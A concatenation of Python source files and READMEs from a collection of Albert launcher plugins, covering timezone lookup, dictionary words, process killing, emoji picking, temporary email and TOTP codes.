"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "tz "
def synopsis(self):
return "city/country name"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
# fetch all logos at startup
country_logos_path.mkdir(exist_ok=True)
if not list(country_logos_path.iterdir()):
print("Downloading country logos")
t = time.time()
download_all_logos()
print(f"Downloaded country logos - Took {time.time() - t} seconds")
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
matched = [
elem for elem in process.extract(query_str, full_name_to_city.keys(), limit=8)
]
v0.debug(matched)
unique_cities_matched = get_uniq_elements(
[full_name_to_city[m[0]] for m in matched]
)
# add own timezone:
if local_tz_str in unique_cities_matched:
unique_cities_matched.remove(local_tz_str)
unique_cities_matched.insert(0, local_tz_str)
results.extend([get_as_item(m) for m in unique_cities_matched])
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># ipshow - Albert plugin
## Description
Show the IPs of the machine at hand. Pretty much like `ip a s` or `ifconfig`.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># abbr - Albert plugin
## Description
Lookup words stored in a file along with their description.
This is a rather esoteric plugin that looks up and saves (key, value) pairs in a
specified file on disk.
I use it to look up items from my personal abbreviations list. You can also add
new items to it by using the `new` keyword.
## Demo
|  |  |
## Installation instructions
* Install the fuzzywuzzy python module
For more refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># saxophone - Albert plugin
## Demo




## Description
This plugin allows you to play internet radio streams without any external
windows or GUIs, directly from Albert. The streams are specified in the
`config/saxophone.json` file, and using that it's trivial to add more streams.
If the stream contains metadata, they will be displayed via a system
notification on metadata change (e.g., when the song changes).
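For reference, adding a stream entry could look roughly like the sketch below;
`url` and `homepage` are the fields the bundled link-checking test reads, while
the `name` key is an assumption:

```python
# Sketch: append a hypothetical stream entry to config/saxophone.json.
import json
from pathlib import Path

cfg = Path("config/saxophone.json")
conts = json.loads(cfg.read_text())
conts["all"].append(
    {
        "name": "My Stream",  # assumed display field
        "url": "http://example.com/stream.mp3",
        "homepage": "http://example.com",
    }
)
cfg.write_text(json.dumps(conts, indent=2))
```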
### Dependencies
I use `mpv` and the [python-mpv c-types
bindings](https://github.com/jaseg/python-mpv) to play the radio stream. For
this to work you have to install `libmpv.so` under your `LD_LIBRARY_PATH` and
make sure that you can `import mpv` from an interactive python interpreter. One
alternative is to install `mpv` via the [mpv-build helper
scripts](https://github.com/mpv-player/mpv-build) with the
`--enable-libmpv-shared` enabled.
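A quick sanity check that the bindings are usable (an illustrative snippet, not
part of the plugin):

```python
# The import fails with an OSError if libmpv.so cannot be found on your
# LD_LIBRARY_PATH.
import mpv

player = mpv.MPV()
player.play("http://example.com/stream")  # hypothetical stream URL
```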
Alternatively if you don't want to go through this, you could check out a
previous commit of this repo, e.g., `cf69a7a` where instead of `mpv` python
bindings, I'm using the `cvlc` executable to play the radio streams.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""Words: meaning, synonyms, antonyms, examples."""
import concurrent.futures
import time
import traceback
from pathlib import Path
import albert as v0
from PyDictionary import PyDictionary
md_name = "Words"
md_description = "Words: meaning, synonyms, antonyms, examples"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/words"
md_lib_dependencies = "git+https://github.com/ctoth/PyDictionary@0acf69d"
icon_path = str(Path(__file__).parent / "words")
icon_path_g = str(Path(__file__).parent / "words_g")
icon_path_r = str(Path(__file__).parent / "words_r")
cache_path = Path(v0.cacheLocation()) / "words"
config_path = Path(v0.configLocation()) / "words"
data_path = Path(v0.dataLocation()) / "words"
pd = PyDictionary()
# plugin main functions -----------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.5 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first
# Only send a request once the user has stopped typing, otherwise the remote
# service may block our IP.
keys_monitor = KeystrokeMonitor()
# supplementary functions ---------------------------------------------------------------------
def get_items_for_word(query, word: str) -> list:
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
outputs = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor:
futures = {
executor.submit(pd.meaning, word): "meanings",
executor.submit(pd.synonym, word): "synonyms",
executor.submit(pd.antonym, word): "antonyms",
}
for future in concurrent.futures.as_completed(futures):
key = futures[future]
try:
outputs[key] = future.result()
except Exception as exc:
print(f"[W] Getting the word {key} generated an exception: {exc}")
    meanings = outputs.get("meanings")
    synonyms = outputs.get("synonyms")
    antonyms = outputs.get("antonyms")
# meaning
items = []
if meanings:
for k, v in meanings.items():
for vi in v:
items.append(
v0.Item(
id=md_name,
icon=[icon_path],
text=vi,
subtext=k,
completion=f"{query.trigger} {word}",
actions=[
ClipAction("Copy", vi),
],
)
)
# synonyms
if synonyms:
items.append(
v0.Item(
id="{md_name}_g",
icon=[icon_path_g],
text="Synonyms",
subtext="|".join(synonyms),
completion=synonyms[0],
actions=[ClipAction(a, a) for a in synonyms],
)
)
# antonym
if antonyms:
items.append(
v0.Item(
id="{md_name}_r",
icon=[icon_path_r],
text="Antonyms",
subtext="|".join(antonyms),
completion=antonyms[0],
actions=[ClipAction(a, a) for a in antonyms],
)
)
return items
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "word "
def synopsis(self):
return "some word e.g., obnoxious"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
# too small request - don't even send it.
if len(query_str) < 2:
keys_monitor.reset()
return
if len(query_str.split()) > 1:
# pydictionary or synonyms.com don't seem to support this
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="A term must be only a single word",
actions=[],
)
)
return
# determine if we can make the request --------------------------------------------
keys_monitor.report()
if keys_monitor.triggered():
results.extend(get_items_for_word(query, query_str))
if not results:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="No results.",
actions=[],
),
)
return
else:
query.add(results)
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep># Search Plugin Template for {{ cookiecutter.plugin_name }}
Current plugin was created using
[search_template](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/search_template/%7B%7B%20cookiecutter.plugin_name%20%7D%7D).
It uses [ddgr](https://github.com/jarun/ddgr) under the hood to offer suggestions /
search results for {{ cookiecutter.plugin_name }} and display them in Albert.
# Installation instructions
Install `ddgr` either from source or from a package. You can find more
instructions [here](https://github.com/jarun/ddgr#installation=).
On Ubuntu 20.04 the following lines should be enough:
```sh
sudo apt install xclip
pip3 install --user --upgrade ddgr
```
Copy this directory to your local Albert plugins directory. By default, that is
under `~/.local/share/albert/org.albert.extension.python/modules`.
<file_sep>#!/usr/bin/env bash
set -x
THIS_DIR=`dirname ${BASH_SOURCE[0]}`/
export LC_ALL=C.UTF-8
export LANG=C.UTF-8
(
cd "$THIS_DIR"
cookiecutter ../cookiecutter/ -o ../plugins/ --no-input
test -d ../plugins/albert_plugin
)
<file_sep>import json
import logging
from concurrent import futures
from pathlib import Path
import requests
logger = logging.getLogger(__name__)
def check_link(link: str) -> requests.Response:
headers = {}
req = requests.head(link, headers=headers, timeout=1)
return req
def test_links():
json_file = Path(__file__).absolute().parent.parent / "config" / "saxophone.json"
with open(json_file, "r") as f:
conts = json.load(f)
links = []
for stream in conts["all"]:
links.extend([val for key, val in stream.items() if key in ("url", "homepage")])
with futures.ThreadPoolExecutor(max_workers=10) as executor:
fs = {executor.submit(check_link, link): link for link in links}
for f in futures.as_completed(fs):
link = fs[f]
logger.debug(f"Checking link - {link}")
# Cannot get HEAD from RadioParadise links - that's OK for now.
assert f.result().ok or f.result().status_code == 400, f"Invalid link detected - {link}"
logger.debug(f"OK - {link}")
<file_sep># harakiri - Albert plugin
## Description
Create a temporary email at [harakirimail.com](https://harakirimail.com/). By
default it opens the inbox in the browser and also copies the generated email
address to the clipboard.
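Roughly, the core action boils down to the following sketch; the inbox name and
the exact address format are illustrative assumptions, see the plugin source
for the real code path:

```python
# Illustrative sketch only - inbox name and address format are assumptions.
import subprocess
import webbrowser

inbox = "myinbox"  # hypothetical inbox name
subprocess.Popen(f"echo {inbox}@harakirimail.com | xclip -selection clipboard", shell=True)
webbrowser.open(f"https://harakirimail.com/inbox/{inbox}")
```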
## Demo
|  |  |
## Installation instructions
On Linux, install `xclip`.
For more info refer to the parent project: [Awesome albert
plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""Kill a process v2."""
import fnmatch
import re
import signal
import traceback
from pathlib import Path
from typing import Dict, List
import psutil
from fuzzywuzzy import process
from gi.repository import GdkPixbuf, Notify
from psutil import Process
import albert as v0
md_name = "Kill Process v2"
md_description = "Terminate/Kill a process - find it using fuzzy expressions ..."
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/killproc"
icon_path = str(Path(__file__).parent / "logo.png")
cache_path = Path(v0.cacheLocation()) / "killproc"
config_path = Path(v0.configLocation()) / "killproc"
data_path = Path(v0.dataLocation()) / "killproc"
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def cmdline(p: Process) -> str:
"""There must be a bug in psutil and sometimes `cmdline()` raises an exception. I don't
want that, so I'll override this behavior for now.
"""
try:
return " ".join(p.cmdline())
except psutil.NoSuchProcess:
return ""
def procs() -> List[Process]:
"""Get a list of all the processes."""
return list(psutil.process_iter())
def globsearch_procs(s: str) -> List[Process]:
"""Return a list of processes whose command line matches the given glob."""
pat = re.compile(fnmatch.translate(s))
procs_ = procs()
procs_out = list(filter(lambda p: re.search(pat, cmdline(p)) is not None, procs_))
notify(msg=f"Glob search returned {len(procs_out)} matching processes")
return procs_out
def get_cmdline_to_procs() -> Dict[str, List[Process]]:
"""Return a Dictionary of command-line args string to all the corresponding processes with
that."""
procs_ = procs()
out = {cmdline(p): [] for p in procs_}
for p in procs_:
out[cmdline(p)].append(p)
return out
def kill_by_name(name: str, signal=signal.SIGTERM):
"""Kill all the processes whose name matches the given one."""
procs_ = procs()
for p in filter(lambda p: p.name() == name, procs_):
p.send_signal(signal)
def get_as_item(query, p: Process, *extra_actions):
"""Return an item - ready to be appended to the items list and be rendered by Albert.
if Process is not a valid object (.name or .cmdline raise an exception) then return None
"""
name_field = cmdline(p)
if not name_field:
return None
try:
actions = [
FuncAction("Terminate", lambda: p.terminate()),
FuncAction("Kill", lambda: p.kill()),
ClipAction("Get PID", f"{p.pid}"),
FuncAction(
"Terminate matching names",
lambda name=p.name(): kill_by_name(name, signal=signal.SIGTERM),
),
FuncAction("Kill matching names", lambda name=p.name(): kill_by_name(name)),
]
actions = [*extra_actions, *actions]
return v0.Item(
id=md_name,
icon=[icon_path],
text=name_field,
subtext="",
completion=f"{query.trigger}{p.name()}",
actions=actions,
)
except psutil.NoSuchProcess:
return None
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "kill "
def synopsis(self):
return "process ID/name"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*."""
try:
query_str = query.string.strip()
cmdline_to_procs = get_cmdline_to_procs()
matched = [
elem[0]
for elem in process.extract(query_str, cmdline_to_procs.keys(), limit=15)
]
extra_actions = []
if any([symbol in query_str for symbol in "*?[]"]):
extra_actions = [
FuncAction(
"Terminate by glob",
lambda: list(
map(lambda p: p.terminate(), globsearch_procs(query_str))
),
),
FuncAction(
"Kill by glob",
lambda: list(map(lambda p: p.kill(), globsearch_procs(query_str))),
),
]
query.add(
[
res
for m in matched
for p in cmdline_to_procs[m]
if (res := get_as_item(query, p, *extra_actions)) is not None
]
)
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Emoji picker."""
import subprocess
import traceback
from pathlib import Path
from albert import *
import em
from fuzzywuzzy import process
import pickle
md_iid = "0.5"
md_version = "0.2"
md_name = "Emoji picker"
md_description = "Lookup and copy various emojis to your clipboard"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/emoji"
md_maintainers = "<NAME>"
md_bin_dependencies = ["xclip"]
md_lib_dependencies = ["em", "fuzzywuzzy"]
# Let Exceptions fly
if "parse_emojis" not in dir(em):
raise RuntimeError(
"Was able to import the em module but no parse_emojis method in it. "
"Are you sure you have pip-installed the em-keyboard module and not the empy module?"
)
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "em "
def synopsis(self):
return "<emoji name>"
def initialize(self):
self.parse_emojis()
self.icon_path = [str(Path(__file__).parent / "emoji.png")]
self.cache_path = Path(cacheLocation()) / "emoji"
self.config_path = Path(configLocation()) / "emoji"
self.data_path = Path(dataLocation()) / "emoji"
self.stats_path = self.config_path / "stats"
# create plugin locations
for p in (self.cache_path, self.config_path, self.data_path):
p.mkdir(parents=False, exist_ok=True)
if not self.stats_path.exists():
with self.stats_path.open("wb") as f:
pickle.dump({}, f)
def parse_emojis(self):
self.emojis = em.parse_emojis()
self.emojis_li = list(self.emojis.items())
# example:
# label: 'folded_hands'
# emoji_tuple: ('🙏', ['folded_hands', 'please', 'hope', 'wish', 'namaste', 'highfive', 'pray'])
self.label_to_emoji_tuple = {}
for emoji_tuple in self.emojis.items():
label_list = emoji_tuple[1]
for label in label_list:
self.label_to_emoji_tuple[label] = emoji_tuple
# debug(f"label_to_emoji_tuple: {self.label_to_emoji_tuple}")
def update_emojis(self):
prev_len = len(self.emojis_li)
self.parse_emojis()
curr_len = len(self.emojis_li)
        if curr_len == prev_len:
            self.notify(msg=f"Found no new emojis - Total emojis count: {curr_len}")
        else:
            diff = curr_len - prev_len
            self.notify(
                msg=f'Found {diff} {"more" if diff > 0 else "fewer"} emojis - Total emojis count: {curr_len}'
            )
def get_stats(self):
with self.stats_path.open("rb") as f:
return pickle.load(f)
def update_stats(self, emoji: str):
stats = self.get_stats()
if emoji in stats:
stats[emoji] += 1
else:
stats[emoji] = 1
with self.stats_path.open("wb") as f:
pickle.dump(stats, f)
def copy_emoji(self, emoji: str):
self.update_stats(emoji)
subprocess.run(f"echo {emoji} | xclip -r -selection clipboard", shell=True)
def handleQuery(self, query):
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
if query_str == "":
results.append(self.get_reindex_item())
recent = [
k
for k, _ in sorted(
self.get_stats().items(), key=lambda item: item[1], reverse=True
)[:10]
]
results.extend(
[self.get_emoji_as_item((emoji, self.emojis[emoji])) for emoji in recent]
)
if len(results) < 30:
results.extend(
self.get_emoji_as_item(emoji_tuple)
for emoji_tuple in self.emojis_li[: 30 - len(results)]
)
else:
matched = process.extract(
query_str, list(self.label_to_emoji_tuple.keys()), limit=30
)
matched_emojis = list(
dict([self.label_to_emoji_tuple[label] for label, *_ in matched]).items()
)
results.extend(
[self.get_emoji_as_item(emoji_tuple) for emoji_tuple in matched_emojis]
)
except Exception: # user to report error
critical(traceback.format_exc())
results.insert(
0,
Item(
id=md_name,
icon=self.icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
Action(
"copy_error",
f"Copy error - report it to {md_url[8:]}",
lambda t=traceback.format_exc(): setClipboardText(t),
)
],
),
)
query.add(results)
def notify(self, msg: str, app_name: str = md_name):
sendTrayNotification(title=app_name, msg=msg, ms=2000)
def get_reindex_item(self):
return self.get_as_item(
text="Re-index list of emojis",
actions=[Action("reindex", "Re-index list of emojis", self.update_emojis)],
)
    def get_as_item(
        self, *, text: str, actions: list, subtext: str = None, completion: str = None
    ):
        """Return an item - ready to be appended to the items list and be rendered by Albert."""
        if subtext is None:
            subtext = text
        if completion is None:
            completion = f"{self.defaultTrigger()}{text}"
return Item(
id=md_name,
icon=self.icon_path,
text=text,
subtext=subtext,
completion=completion,
actions=actions,
)
def get_emoji_as_item(self, emoji_tuple: tuple):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
emoji = emoji_tuple[0]
labels = [label.replace("_", " ") for label in emoji_tuple[1]]
main_label = labels[0]
text = f"{emoji} {main_label}"
subtext = " | ".join(labels[1:])
return Item(
id=md_name,
icon=self.icon_path,
text=text,
subtext=subtext,
completion=f"{self.defaultTrigger()}{main_label}",
actions=[
Action("copy", f"Copy this emoji", lambda emoji=emoji: self.copy_emoji(emoji)),
Action(
"google",
f"Google this emoji",
lambda u=f"https://www.google.com/search?q={main_label} emoji": openUrl(u),
),
],
)
def save_data(self, data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(self.config_path / data_name, "w") as f:
f.write(data)
def load_data(self, data_name: str) -> str:
"""Load a piece of data from the configuration directory."""
with open(self.config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
<file_sep># clock - Albert plugin
## Description
Create stopwatches and countdown objects that will measure how much time you
spend in tasks and notify you when the designated time is up.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># Google Translate - Albert plugin
## Description
Translate to and from all the languages that Google translate supports
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># meme-generator - Albert plugin
## Description
Generate memes from a variety of image selection and add your custom text.
Then, copy it to your clipboard, or save it to disk.
Optionally you can add effects to the meme, e.g., shaking.
The meme generation runs offline, there's no need to be connected to the internet.
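Under the hood the plugin shells out to the `meme` executable; a call roughly
along the following lines (the template id, text, and flags are illustrative -
see the `meme` README for the exact interface):

```
import subprocess

# Illustrative invocation: template id, "top text|bottom text", output file.
subprocess.run(
    ["meme", "-i", "brace-yourselves", "-t", "Brace yourselves|Memes are coming", "-o", "/tmp/out.png"],
    check=True,
)
```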
## Demo

## Installation instructions
* Install [meme](https://github.com/nomad-software/meme) directly from github.
You'll need a relatively recent version of `go` for this. You could use
[gvm](https://github.com/moovweb/gvm) if that's not supported by your package
manager.
* Install [xclip](https://linux.die.net/man/1/xclip)
Refer to the parent project for more: [Awesome albert
plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""Harakiri mail temporary email."""
import random
import string
import subprocess
import traceback
import webbrowser
from pathlib import Path
import albert as v0
md_name = "Harakiri"
md_description = "Harakiri mail - access a temporary email address"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/harakiri"
icon_path = str(Path(__file__).parent / "harakiri")
cache_path = Path(v0.cacheLocation()) / "harakiri"
config_path = Path(v0.configLocation()) / "harakiri"
data_path = Path(v0.dataLocation()) / "harakiri"
def randstr(strnum=15) -> str:
return "".join(
random.SystemRandom().choice(
string.ascii_lowercase + string.ascii_uppercase + string.digits
)
for _ in range(strnum)
)
# supplementary functions ---------------------------------------------------------------------
def copy_and_go(email: str):
url = f"https://harakirimail.com/inbox/{email}"
subprocess.Popen(f"echo {<EMAIL> | xclip -selection clipboard", shell=True)
webbrowser.open(url)
def get_as_item(query, email):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"Temporary email: {email}",
subtext="",
completion=f"{query.trigger} {email}",
actions=[
FuncAction(
"Open in browser (and copy email address)",
lambda email=email: copy_and_go(email),
),
],
)
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "harakiri "
def synopsis(self):
return "email address to spawn"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
query_str = query.string.strip()
query.add(get_as_item(query, query_str if query_str else randstr()))
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep># {{ cookiecutter.plugin_name }} - Albert plugin
## TODO Plugin is not ready yet - README info may be inaccurate
## TODO - Add demo gif/pictures
## Description
## Demo
|  |  |
## Installation instructions
Refer to the parent project: [Awesome albert plugins]({{ cookiecutter.parent_repo_url }})
## Self Promotion
If you find this tool useful, please [star it on Github]({{ cookiecutter.parent_repo_url }})
## TODO List
See [ISSUES list]({{ cookiecutter.parent_repo_url }}/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""2FA codes using otp-cli and pass."""
import os
import subprocess
import traceback
from pathlib import Path
import albert as v0
import gi
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
md_name = "OTP/2FA Codes"
md_description = "Fetch OTP codes using otp-cli and pass"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/pass_totp_cli"
)
md_bin_dependencies = ["pass", "totp"]
icon_path = str(Path(__file__).parent / "pass_totp_cli")
cache_path = Path(v0.cacheLocation()) / "pass_totp_cli"
config_path = Path(v0.configLocation()) / "pass_totp_cli"
data_path = Path(v0.dataLocation()) / "pass_totp_cli"
pass_dir = Path(
os.environ.get(
"PASSWORD_STORE_DIR", os.path.join(os.path.expanduser("~/.password-store/"))
)
)
pass_2fa_dir = pass_dir / "2fa"
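# Assumed pass-store layout: each OTP secret is a pass entry somewhere under
# the "2fa" subfolder, e.g. ~/.password-store/2fa/github/totp.gpg, which the
# plugin then lists as "github" (the .gpg file's parent directory).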
def do_notify(msg: str, image=None):
app_name = "pass_topt_cli"
Notify.init(app_name)
image = image
n = Notify.Notification.new(app_name, msg, image)
n.show()
# supplementary functions ---------------------------------------------------------------------
def totp_show(name: str) -> str:
try:
return subprocess.check_output(["totp", "show", name]).decode("utf-8")
except Exception:
exc = f"Exception:\n\n{traceback.format_exc()}"
v0.critical(exc)
do_notify(f"Couldn't fetch the OTP code. {exc}")
return ""
def get_as_item(path: Path):
name = str(path.relative_to(pass_2fa_dir).parent)
return v0.Item(
id=md_name,
icon=[icon_path],
text=name,
completion="",
actions=[
FuncAction(
"Copy 2FA code",
lambda name=name: v0.setClipboardText(totp_show(name=name).strip()),
)
],
)
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
